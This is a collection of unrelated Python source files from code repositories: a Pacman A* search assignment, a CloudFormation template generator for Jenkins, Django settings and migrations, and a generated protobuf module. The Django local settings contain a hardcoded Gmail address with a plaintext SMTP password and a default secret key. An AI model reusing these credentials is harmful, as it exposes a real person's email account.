        for _,_,vert in NoVisit.heap:
            dist = manDist(vert,popVert)
            NoVisit.update(vert,dist)
    return minDist
class ClosestDotSearchAgent(SearchAgent):
    "Search for all food using a sequence of searches"
    def registerInitialState(self, state):
        """Greedily chain shortest paths to the closest dot until no food
        remains, validating each returned move against the game rules."""
        self.actions = []
        currentState = state
        while(currentState.getFood().count() > 0):
            nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
            self.actions += nextPathSegment
            for action in nextPathSegment:
                legal = currentState.getLegalActions()
                if action not in legal:
                    t = (str(action), str(currentState))
                    raise Exception, 'findPathToClosestDot returned an illegal move: %s!\n%s' % t
                currentState = currentState.generateSuccessor(0, action)
        self.actionIndex = 0
        print 'Path found with cost %d.' % len(self.actions)

    def findPathToClosestDot(self, gameState):
        """
        Returns a path (a list of actions) to the closest dot, starting from
        gameState.

        Implementation: A* over AnyFoodSearchProblem using nearestFoodHeur.
        Three priority queues (state / route-so-far / cost-so-far) are kept
        in lockstep -- they are pushed with identical priorities in the same
        order, so pops stay aligned (relies on util.PriorityQueue's
        insertion-count tie-breaking; confirm against util.py).
        """
        # Here are some useful elements of the startState
        startPosition = gameState.getPacmanPosition()
        food = gameState.getFood()
        walls = gameState.getWalls()
        problem = AnyFoodSearchProblem(gameState)

        "*** YOUR CODE HERE ***"
        import util
        stateQueue = util.PriorityQueue()
        actionQueue = util.PriorityQueue()
        costQueue = util.PriorityQueue()
        # Closed list of positions already enqueued (list membership is O(n)).
        stateSet = []
        stateSet.append(startPosition)
        stateQueue.push(startPosition,0)
        actionQueue.push([],0)
        costQueue.push(0,0)
        while not stateQueue.isEmpty():
            popState = stateQueue.pop()
            if problem.isGoalState(popState):
                return actionQueue.pop()
            else:
                routeHistory = actionQueue.pop()
                costHistory = costQueue.pop()
                successorStates = problem.getSuccessors(popState)
                if successorStates:
                    for (state,action,cost) in successorStates:
                        if state not in stateSet:
                            # Extend a copy of the route; priority is f = g + h.
                            currentRoute = routeHistory[:]
                            currentRoute.append(action)
                            currentCost = costHistory + cost
                            heur = nearestFoodHeur(state,problem)
                            currentCostHeur = currentCost + heur
                            stateQueue.push(state,currentCostHeur)
                            actionQueue.push(currentRoute,currentCostHeur)
                            costQueue.push(currentCost,currentCostHeur)
                            stateSet.append(state)
        print "Unable to find a route"
def nearestFoodHeur(state, problem):
    '''Manhattan distance from state to the closest remaining food dot.

    state is an (x, y) position; problem.food.asList() yields the remaining
    dot coordinates. Returns 0 when no food is left.
    '''
    foods = problem.food.asList()
    if not foods:
        return 0
    # Manhattan distance, inlined so this function is self-contained.
    return min(abs(state[0] - fx) + abs(state[1] - fy) for fx, fy in foods)
class AnyFoodSearchProblem(PositionSearchProblem):
    """
    A search problem for finding a path to *any* food dot.

    Identical to PositionSearchProblem except for the goal test: a state is
    a goal whenever Pacman stands on a cell that still contains food. The
    state space and successor function are inherited unchanged.
    """

    def __init__(self, gameState):
        "Stores information from the gameState. You don't need to change this."
        # Remember the food layout for the goal test below.
        self.food = gameState.getFood()
        # State needed by the inherited PositionSearchProblem machinery.
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        self.costFn = lambda x: 1
        self._visited, self._visitedlist, self._expanded = {}, [], 0  # DO NOT CHANGE

    def isGoalState(self, state):
        """Goal test: the position sits on a remaining food dot (1/0)."""
        x, y = state
        return 1 if (x, y) in self.food.asList() else 0
def mazeDistance(point1, point2, gameState):
    """
    Length of the shortest maze path between point1 and point2, found with
    the breadth-first search you already built. The gameState can be any
    game state -- Pacman's position in that state is ignored.

    Example usage: mazeDistance( (2,4), (5,6), gameState)
    This might be a useful helper function for your ApproximateSearchAgent.
    """
    walls = gameState.getWalls()
    assert not walls[point1[0]][point1[1]], 'point1 is a wall: ' + str(point1)
    assert not walls[point2[0]][point2[1]], 'point2 is a wall: ' + str(point2)
    path = search.bfs(PositionSearchProblem(gameState, start=point1,
                                            goal=point2, warn=False,
                                            visualize=False))
    return len(path)
| [
"xiaojunch@gmail.com"
] | xiaojunch@gmail.com |
175e2835830e918abdf633ac13e097ad4dffcd2c | 6e5ddc38d08a060dee8ce705290f180ba0ea43d9 | /jenkins-cf-template.py | e3bf14acc62e3e30bc7da0e31048f4d88980b7a9 | [] | no_license | escher100/effectiveDevOps | 91d91748d27714b4b32e3a09980b70a471e86c9b | c4f93d19cf4bce650b8c3e1d1bd270b5004c8a91 | refs/heads/master | 2021-01-21T13:29:34.031503 | 2017-10-10T16:48:25 | 2017-10-10T16:48:25 | 102,128,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,292 | py | """Generating CloudFormation template."""
from ipaddress import ip_network
from ipify import get_ip
from troposphere import (
Base64,
ec2,
GetAtt,
Join,
Output,
Parameter,
Ref,
Template,
)
ApplicationName = "jenkins"
ApplicationPort = "8080"
# Setup Github repo to install ansible, gut and
# install app and files
GithubAccount='escher100'
GithubAnsibleURL='https://github.com/{}/ansible'.format(GithubAccount)
AnsiblePullCmd = \
"/usr/local/bin/ansible-pull -U {} {}.yaml -i localhost".format(
GithubAnsibleURL,
ApplicationName
)
ud = Base64(Join('\n', [
"#!/bin/bash",
"touch /home/ec2-user/userdata.touch"
]))
ud = Base64(Join('\n', [
"#!/bin/bash",
"yum install -y git",
"pip install ansible",
AnsiblePullCmd,
"echo '*/10 * * * * ec2-user {}' > /etc/cron.d/ansible-pull".format(AnsiblePullCmd)
]))
PublicCidrIp = str(ip_network(get_ip()))
t = Template()
t.add_description("Effective DevOps in AWS: HelloWorld web application")
t.add_parameter(Parameter(
"KeyPair",
Description="Name of an existing EC2 KeyPair to SSH",
Type="AWS::EC2::KeyPair::KeyName",
ConstraintDescription="must be the name of an existing EC2 KeyPair.",
))
t.add_resource(ec2.SecurityGroup(
"SecurityGroup",
GroupDescription="Allow SSH and TCP/{} access".format(ApplicationPort),
SecurityGroupIngress=[
ec2.SecurityGroupRule(
IpProtocol="tcp",
FromPort="22",
ToPort="22",
CidrIp=PublicCidrIp,
),
ec2.SecurityGroupRule(
IpProtocol="tcp",
FromPort=ApplicationPort,
ToPort=ApplicationPort,
CidrIp="0.0.0.0/0",
),
],
))
t.add_resource(ec2.Instance(
"instance",
ImageId="ami-a4c7edb2",
InstanceType="t2.micro",
SecurityGroups=[Ref("SecurityGroup")],
KeyName=Ref("KeyPair"),
UserData=ud,
))
t.add_output(Output(
"InstancePublicIp",
Description="Public IP of our instance.",
Value=GetAtt("instance", "PublicIp"),
))
t.add_output(Output(
"WebUrl",
Description="Application endpoint",
Value=Join("", [
"http://", GetAtt("instance", "PublicDnsName"),
":", ApplicationPort
]),
))
print(t.to_json())
| [
"escher00@yahoo.com"
] | escher00@yahoo.com |
15205ba55d76eb5bd6affa8f92d7501e5f2d30b2 | e40f1fbddf344e2b0addfd82b47cbc7590c34cd7 | /config/settings/local.py | 9bca4c920aa8fc37271052ec8e07d0bc6b5f074c | [
"MIT"
] | permissive | rchdlps/django-docker | 48ca4a6320c2f7735f6a9cb5271ad2dff62cca3e | 2c12732264c1f17cd62e20927b5956db498c30b7 | refs/heads/master | 2020-03-30T16:22:14.145387 | 2018-10-03T12:06:20 | 2018-10-03T12:06:20 | 151,405,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,096 | py | from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env('DJANGO_SECRET_KEY', default='NHA3a1maZNDntNQk40J0us7p4TGXDiRZZCKOLGvVYrRogC6g2imTmKOMbTgAJApc')
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [
"localhost",
"0.0.0.0",
"127.0.0.1",
]
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG # noqa F405
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.console.EmailBackend')
# https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
# https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 587
EMAIL_USE_TLS = True
EMAIL_HOST_USER = 'lopes.dexatec@gmail.com'
EMAIL_HOST_PASSWORD = 't5v5m2j2'
# django-debug-toolbar
# ------------------------------------------------------------------------------
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites
INSTALLED_APPS += ['debug_toolbar'] # noqa F405
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware
MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware'] # noqa F405
# https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2']
# django-extensions
# ------------------------------------------------------------------------------
# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration
INSTALLED_APPS += ['django_extensions'] # noqa F405
# Celery
# ------------------------------------------------------------------------------
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-always-eager
CELERY_TASK_ALWAYS_EAGER = True
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-eager-propagates
CELERY_TASK_EAGER_PROPAGATES = True
# Your stuff...
# ------------------------------------------------------------------------------
| [
"rchdlps@gmail.com"
] | rchdlps@gmail.com |
1c95e6322f01f2981b14f4584444c325432b8207 | 490ffe1023a601760ae7288e86723f0c6e366bba | /kolla-docker/patching/zun_compute_api/providerregion.py | 4dc91fc51a266902d9ef25f4c4c4b88fc506ef8c | [] | no_license | bopopescu/Cloud-User-Management | 89696a5ea5d2f95191327fbeab6c3e400bbfb2b8 | 390988bf4915a276c7bf8d96b62c3051c17d9e6e | refs/heads/master | 2022-11-19T10:09:36.662906 | 2018-11-07T20:28:31 | 2018-11-07T20:28:31 | 281,786,345 | 0 | 0 | null | 2020-07-22T21:26:07 | 2020-07-22T21:26:06 | null | UTF-8 | Python | false | false | 1,658 | py | def providerregion_update(self, context, container, *args):
if direct_action:
return self.manager.providerregion_update(context, container, *args)
else:
return self.rpcapi.providerregion_update(context, container, *args)
def providerregion_show(self, context, container, *args):
if direct_action:
return self.manager.providerregion_show(context, container)
else:
return self.rpcapi.providerregion_show(context, container)
def providerregion_create(self, context, new_providerregion, extra_spec,
requested_networks):
host_state = None
try:
host_state = {} # self._schedule_container(context, new_providerregion, extra_spec)
except Exception as exc:
# new_providerregion.status = consts.ERROR
# new_providerregion.status_reason = str(exc)
# new_providerregion.save(context)
return
if direct_action:
self.manager.providerregion_create(context, "", requested_networks, new_providerregion)
else:
self.rpcapi.providerregion_create(context, "", new_providerregion, "", requested_networks)
# self.rpcapi.providerregion_create(context, host_state['host'],
# new_providerregion, host_state['limits'],
# requested_networks)
def providerregion_delete(self, context, container, *args):
return self.manager.providerregion_delete(context, container, True)
# return self.rpcapi.providerregion_delete(context, container, *args)
| [
"Mr.Qinlichao@hotmail.com"
] | Mr.Qinlichao@hotmail.com |
7d30bdd38adf7e9f60ce553d4bff9fdca4b79980 | 5d986636a746aa8bab3b3412f15e66992a4d5c6e | /demos/week03_alfred/final_demo.py | ecb7715449fd04f953563443e52af19ffced16d6 | [] | no_license | DL-StudyGroup/deep_learning_from_scratch | 863444c2be1b4c426a42b0385f90f599c5c87860 | 561d4405b9a583f369639026376fb95133e2dc7e | refs/heads/master | 2020-04-08T23:36:32.282595 | 2019-05-12T09:12:03 | 2019-05-12T09:12:03 | 159,832,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def relu(x):
return np.maximum(0.0, x)
X = np.array([1.0, 0.5])
W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
B1 = np.array([0.1, 0.2, 0.3])
W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
B2 = np.array([0.1, 0.2])
W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
B3 = np.array([0.1, 0.2])
a1 = np.dot(X, W1) + B1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + B2
z2 = relu(a2)
y = z2 + B3
print("X:", X)
print("------------")
print("a1:", a1)
print("z1:", z1)
print("a2:", a2)
print("z2:", z2)
print("-------------")
print("the final y: ", y)
| [
"super.marrimo@gmail.com"
] | super.marrimo@gmail.com |
ea468b999d209aa5949f47fbf2a33213a78b306b | 4369c5a214f8c4fb1f8a286f72d57cfa9c3f02c7 | /geotrek/maintenance/migrations/0010_auto_20200228_1755.py | dfa45158e5acc1cee91f1e527738011a5ef40379 | [
"BSD-2-Clause"
] | permissive | GeotrekCE/Geotrek-admin | c13d251066e92359c26f22d185b8bd2e26e622ef | a91b75261a876be51ad2a693618629900bea6003 | refs/heads/master | 2023-08-21T12:45:25.586551 | 2023-08-09T12:28:33 | 2023-08-09T12:28:33 | 9,886,107 | 71 | 56 | BSD-2-Clause | 2023-09-13T09:40:33 | 2013-05-06T12:17:21 | Python | UTF-8 | Python | false | false | 1,121 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2020-02-28 16:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('maintenance', '0009_auto_20200211_1011'),
]
operations = [
migrations.AlterField(
model_name='intervention',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='intervention',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AlterField(
model_name='project',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='project',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
]
| [
"gael.utard@makina-corpus.com"
] | gael.utard@makina-corpus.com |
a67fd9139f1b1a1a5f55555ccfc4ea911006371a | f1e98def25f88d17c328c07d4052cd6c34c27707 | /app/accounts/migrations/0002_alter_account_is_active.py | c7dd55e323cc76df4802b6c243d6f44f3d2b3d94 | [
"MIT"
] | permissive | iyanuashiri/exchange-api | c7f1fd2257c3369de9c0b7bea6806c602f25662e | 86f7a4e9fb17f71888e6854510618876d1010c19 | refs/heads/main | 2023-05-30T22:57:46.901693 | 2021-06-13T21:59:22 | 2021-06-13T21:59:22 | 376,542,066 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | # Generated by Django 3.2.4 on 2021-06-13 17:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='account',
name='is_active',
field=models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active'),
),
]
| [
"ajaoiyanu@gmail.com"
] | ajaoiyanu@gmail.com |
9685e8cfcd31ffd39a866a869baaa544acb5ec95 | 51cbdd33fd4480a920ee4e7a226f2e5ab8c59135 | /ex010.py | 37bc85729b645f2a46ef65a110cceeb011b73ce6 | [] | no_license | Prixribeiro/CursoPython | 6d9e6d74da795b5d9cc6e33811e4c727227b8633 | 61f4bc1d12243611197b84085f08f378ff1f97f1 | refs/heads/main | 2023-07-18T07:11:13.627425 | 2021-09-08T22:05:09 | 2021-09-08T22:05:09 | 404,506,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #Exercício Python 10: Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
rs = float(input('Digite o valor em Reais (R$) que deseja converter para dólares: '))
print('Com o valor de R$ {:.2f}, você obterá USD {:.2f}.'.format(rs, rs/5.32)) | [
"priscila.ribeiro@blueshift.com.br"
] | priscila.ribeiro@blueshift.com.br |
fe310f983b6714414978669e071340bb0e31060d | 1d6ee28b8f5a7e820b5b53a924fb611e99d39c9e | /third-party/stanza/stanza/nlp/CoreNLP_pb2.py | 483d71a011054f568487a422472e134ff8011531 | [
"Apache-2.0"
] | permissive | arunchaganty/django-corenlp | bb222c47fd2f02bd10b559fc52250ce8f2b5871f | 4cda142d375bdac84057cedc3d08b525b1e2d498 | refs/heads/master | 2020-05-21T18:06:34.616273 | 2016-10-01T18:50:46 | 2016-10-01T18:50:46 | 64,433,765 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | true | 124,473 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: CoreNLP.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='CoreNLP.proto',
package='edu.stanford.nlp.pipeline',
serialized_pb=_b('\n\rCoreNLP.proto\x12\x19\x65\x64u.stanford.nlp.pipeline\"\xea\x02\n\x08\x44ocument\x12\x0c\n\x04text\x18\x01 \x02(\t\x12\x35\n\x08sentence\x18\x02 \x03(\x0b\x32#.edu.stanford.nlp.pipeline.Sentence\x12\x39\n\ncorefChain\x18\x03 \x03(\x0b\x32%.edu.stanford.nlp.pipeline.CorefChain\x12\r\n\x05\x64ocID\x18\x04 \x01(\t\x12\x0f\n\x07\x64ocDate\x18\x07 \x01(\t\x12\x10\n\x08\x63\x61lendar\x18\x08 \x01(\x04\x12;\n\x11sentencelessToken\x18\x05 \x03(\x0b\x32 .edu.stanford.nlp.pipeline.Token\x12/\n\x05quote\x18\x06 \x03(\x0b\x32 .edu.stanford.nlp.pipeline.Quote\x12\x37\n\x08mentions\x18\t \x03(\x0b\x32%.edu.stanford.nlp.pipeline.NERMention*\x05\x08\x64\x10\x80\x02\"\xeb\x0b\n\x08Sentence\x12/\n\x05token\x18\x01 \x03(\x0b\x32 .edu.stanford.nlp.pipeline.Token\x12\x18\n\x10tokenOffsetBegin\x18\x02 \x02(\r\x12\x16\n\x0etokenOffsetEnd\x18\x03 \x02(\r\x12\x15\n\rsentenceIndex\x18\x04 \x01(\r\x12\x1c\n\x14\x63haracterOffsetBegin\x18\x05 \x01(\r\x12\x1a\n\x12\x63haracterOffsetEnd\x18\x06 \x01(\r\x12\x37\n\tparseTree\x18\x07 \x01(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12@\n\x12\x62inarizedParseTree\x18\x1f \x01(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12@\n\x12\x61nnotatedParseTree\x18 \x01(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12\x11\n\tsentiment\x18! 
\x01(\t\x12=\n\x0fkBestParseTrees\x18\" \x03(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12\x45\n\x11\x62\x61sicDependencies\x18\x08 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12I\n\x15\x63ollapsedDependencies\x18\t \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12T\n collapsedCCProcessedDependencies\x18\n \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12K\n\x17\x61lternativeDependencies\x18\r \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12?\n\x0copenieTriple\x18\x0e \x03(\x0b\x32).edu.stanford.nlp.pipeline.RelationTriple\x12<\n\tkbpTriple\x18\x10 \x03(\x0b\x32).edu.stanford.nlp.pipeline.RelationTriple\x12\x45\n\x10\x65ntailedSentence\x18\x0f \x03(\x0b\x32+.edu.stanford.nlp.pipeline.SentenceFragment\x12H\n\x14\x65nhancedDependencies\x18\x11 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12P\n\x1c\x65nhancedPlusPlusDependencies\x18\x12 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12\x11\n\tparagraph\x18\x0b \x01(\r\x12\x0c\n\x04text\x18\x0c \x01(\t\x12\x1e\n\x16hasRelationAnnotations\x18\x33 \x01(\x08\x12\x31\n\x06\x65ntity\x18\x34 \x03(\x0b\x32!.edu.stanford.nlp.pipeline.Entity\x12\x35\n\x08relation\x18\x35 \x03(\x0b\x32#.edu.stanford.nlp.pipeline.Relation\x12$\n\x1chasNumerizedTokensAnnotation\x18\x36 \x01(\x08\x12\x37\n\x08mentions\x18\x37 \x03(\x0b\x32%.edu.stanford.nlp.pipeline.NERMention\x12<\n\x10mentionsForCoref\x18\x38 \x03(\x0b\x32\".edu.stanford.nlp.pipeline.Mention\x12\"\n\x1ahasCorefMentionsAnnotation\x18\x39 \x01(\x08\x12\x12\n\nsentenceID\x18: \x01(\t*\x05\x08\x64\x10\x80\x02\"\xf4\x07\n\x05Token\x12\x0c\n\x04word\x18\x01 \x02(\t\x12\x0b\n\x03pos\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\x12\x10\n\x08\x63\x61tegory\x18\x04 \x01(\t\x12\x0e\n\x06\x62\x65\x66ore\x18\x05 \x01(\t\x12\r\n\x05\x61\x66ter\x18\x06 \x01(\t\x12\x14\n\x0coriginalText\x18\x07 \x01(\t\x12\x0b\n\x03ner\x18\x08 \x01(\t\x12\x15\n\rnormalizedNER\x18\t \x01(\t\x12\r\n\x05lemma\x18\n 
\x01(\t\x12\x11\n\tbeginChar\x18\x0b \x01(\r\x12\x0f\n\x07\x65ndChar\x18\x0c \x01(\r\x12\x11\n\tutterance\x18\r \x01(\r\x12\x0f\n\x07speaker\x18\x0e \x01(\t\x12\x12\n\nbeginIndex\x18\x0f \x01(\r\x12\x10\n\x08\x65ndIndex\x18\x10 \x01(\r\x12\x17\n\x0ftokenBeginIndex\x18\x11 \x01(\r\x12\x15\n\rtokenEndIndex\x18\x12 \x01(\r\x12\x34\n\ntimexValue\x18\x13 \x01(\x0b\x32 .edu.stanford.nlp.pipeline.Timex\x12\x15\n\rhasXmlContext\x18\x15 \x01(\x08\x12\x12\n\nxmlContext\x18\x16 \x03(\t\x12\x16\n\x0e\x63orefClusterID\x18\x17 \x01(\r\x12\x0e\n\x06\x61nswer\x18\x18 \x01(\t\x12\x15\n\rheadWordIndex\x18\x1a \x01(\r\x12\x35\n\x08operator\x18\x1b \x01(\x0b\x32#.edu.stanford.nlp.pipeline.Operator\x12\x35\n\x08polarity\x18\x1c \x01(\x0b\x32#.edu.stanford.nlp.pipeline.Polarity\x12-\n\x04span\x18\x1d \x01(\x0b\x32\x1f.edu.stanford.nlp.pipeline.Span\x12\x11\n\tsentiment\x18\x1e \x01(\t\x12\x16\n\x0equotationIndex\x18\x1f \x01(\x05\x12\x42\n\x0e\x63onllUFeatures\x18 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.MapStringString\x12\x11\n\tcoarseTag\x18! 
\x01(\t\x12\x38\n\x0f\x63onllUTokenSpan\x18\" \x01(\x0b\x32\x1f.edu.stanford.nlp.pipeline.Span\x12\x12\n\nconllUMisc\x18# \x01(\t\x12\x44\n\x13\x63onllUSecondaryDeps\x18$ \x01(\x0b\x32\'.edu.stanford.nlp.pipeline.MapIntString\x12\x17\n\x0fwikipediaEntity\x18% \x01(\t\x12\x0e\n\x06gender\x18\x33 \x01(\t\x12\x10\n\x08trueCase\x18\x34 \x01(\t\x12\x14\n\x0ctrueCaseText\x18\x35 \x01(\t*\x05\x08\x64\x10\x80\x02\"\xa1\x01\n\x05Quote\x12\x0c\n\x04text\x18\x01 \x01(\t\x12\r\n\x05\x62\x65gin\x18\x02 \x01(\r\x12\x0b\n\x03\x65nd\x18\x03 \x01(\r\x12\x15\n\rsentenceBegin\x18\x05 \x01(\r\x12\x13\n\x0bsentenceEnd\x18\x06 \x01(\r\x12\x12\n\ntokenBegin\x18\x07 \x01(\r\x12\x10\n\x08tokenEnd\x18\x08 \x01(\r\x12\r\n\x05\x64ocid\x18\t \x01(\t\x12\r\n\x05index\x18\n \x01(\r\"\xc7\x01\n\tParseTree\x12\x33\n\x05\x63hild\x18\x01 \x03(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12\r\n\x05value\x18\x02 \x01(\t\x12\x17\n\x0fyieldBeginIndex\x18\x03 \x01(\r\x12\x15\n\ryieldEndIndex\x18\x04 \x01(\r\x12\r\n\x05score\x18\x05 \x01(\x01\x12\x37\n\tsentiment\x18\x06 \x01(\x0e\x32$.edu.stanford.nlp.pipeline.Sentiment\"\x96\x03\n\x0f\x44\x65pendencyGraph\x12=\n\x04node\x18\x01 \x03(\x0b\x32/.edu.stanford.nlp.pipeline.DependencyGraph.Node\x12=\n\x04\x65\x64ge\x18\x02 \x03(\x0b\x32/.edu.stanford.nlp.pipeline.DependencyGraph.Edge\x12\x10\n\x04root\x18\x03 \x03(\rB\x02\x10\x01\x1a\x44\n\x04Node\x12\x15\n\rsentenceIndex\x18\x01 \x02(\r\x12\r\n\x05index\x18\x02 \x02(\r\x12\x16\n\x0e\x63opyAnnotation\x18\x03 \x01(\r\x1a\xac\x01\n\x04\x45\x64ge\x12\x0e\n\x06source\x18\x01 \x02(\r\x12\x0e\n\x06target\x18\x02 \x02(\r\x12\x0b\n\x03\x64\x65p\x18\x03 \x01(\t\x12\x0f\n\x07isExtra\x18\x04 \x01(\x08\x12\x12\n\nsourceCopy\x18\x05 \x01(\r\x12\x12\n\ntargetCopy\x18\x06 \x01(\r\x12>\n\x08language\x18\x07 \x01(\x0e\x32#.edu.stanford.nlp.pipeline.Language:\x07Unknown\"\xc6\x02\n\nCorefChain\x12\x0f\n\x07\x63hainID\x18\x01 \x02(\x05\x12\x43\n\x07mention\x18\x02 
\x03(\x0b\x32\x32.edu.stanford.nlp.pipeline.CorefChain.CorefMention\x12\x16\n\x0erepresentative\x18\x03 \x02(\r\x1a\xc9\x01\n\x0c\x43orefMention\x12\x11\n\tmentionID\x18\x01 \x01(\x05\x12\x13\n\x0bmentionType\x18\x02 \x01(\t\x12\x0e\n\x06number\x18\x03 \x01(\t\x12\x0e\n\x06gender\x18\x04 \x01(\t\x12\x0f\n\x07\x61nimacy\x18\x05 \x01(\t\x12\x12\n\nbeginIndex\x18\x06 \x01(\r\x12\x10\n\x08\x65ndIndex\x18\x07 \x01(\r\x12\x11\n\theadIndex\x18\t \x01(\r\x12\x15\n\rsentenceIndex\x18\n \x01(\r\x12\x10\n\x08position\x18\x0b \x01(\r\"\xef\x08\n\x07Mention\x12\x11\n\tmentionID\x18\x01 \x01(\x05\x12\x13\n\x0bmentionType\x18\x02 \x01(\t\x12\x0e\n\x06number\x18\x03 \x01(\t\x12\x0e\n\x06gender\x18\x04 \x01(\t\x12\x0f\n\x07\x61nimacy\x18\x05 \x01(\t\x12\x0e\n\x06person\x18\x06 \x01(\t\x12\x12\n\nstartIndex\x18\x07 \x01(\r\x12\x10\n\x08\x65ndIndex\x18\t \x01(\r\x12\x11\n\theadIndex\x18\n \x01(\r\x12\x12\n\nheadString\x18\x0b \x01(\t\x12\x11\n\tnerString\x18\x0c \x01(\t\x12\x13\n\x0boriginalRef\x18\r \x01(\r\x12\x1a\n\x12goldCorefClusterID\x18\x0e \x01(\x05\x12\x16\n\x0e\x63orefClusterID\x18\x0f \x01(\x05\x12\x12\n\nmentionNum\x18\x10 \x01(\r\x12\x0f\n\x07sentNum\x18\x11 \x01(\r\x12\r\n\x05utter\x18\x12 \x01(\r\x12\x11\n\tparagraph\x18\x13 \x01(\r\x12\x11\n\tisSubject\x18\x14 \x01(\x08\x12\x16\n\x0eisDirectObject\x18\x15 \x01(\x08\x12\x18\n\x10isIndirectObject\x18\x16 \x01(\x08\x12\x1b\n\x13isPrepositionObject\x18\x17 \x01(\x08\x12\x0f\n\x07hasTwin\x18\x18 \x01(\x08\x12\x0f\n\x07generic\x18\x19 \x01(\x08\x12\x13\n\x0bisSingleton\x18\x1a \x01(\x08\x12\x1a\n\x12hasBasicDependency\x18\x1b \x01(\x08\x12\x1d\n\x15hasEnhancedDepenedncy\x18\x1c \x01(\x08\x12\x1b\n\x13hasContextParseTree\x18\x1d \x01(\x08\x12?\n\x0fheadIndexedWord\x18\x1e \x01(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12=\n\rdependingVerb\x18\x1f \x01(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12\x38\n\x08headWord\x18 \x01(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12;\n\x0bspeakerInfo\x18! 
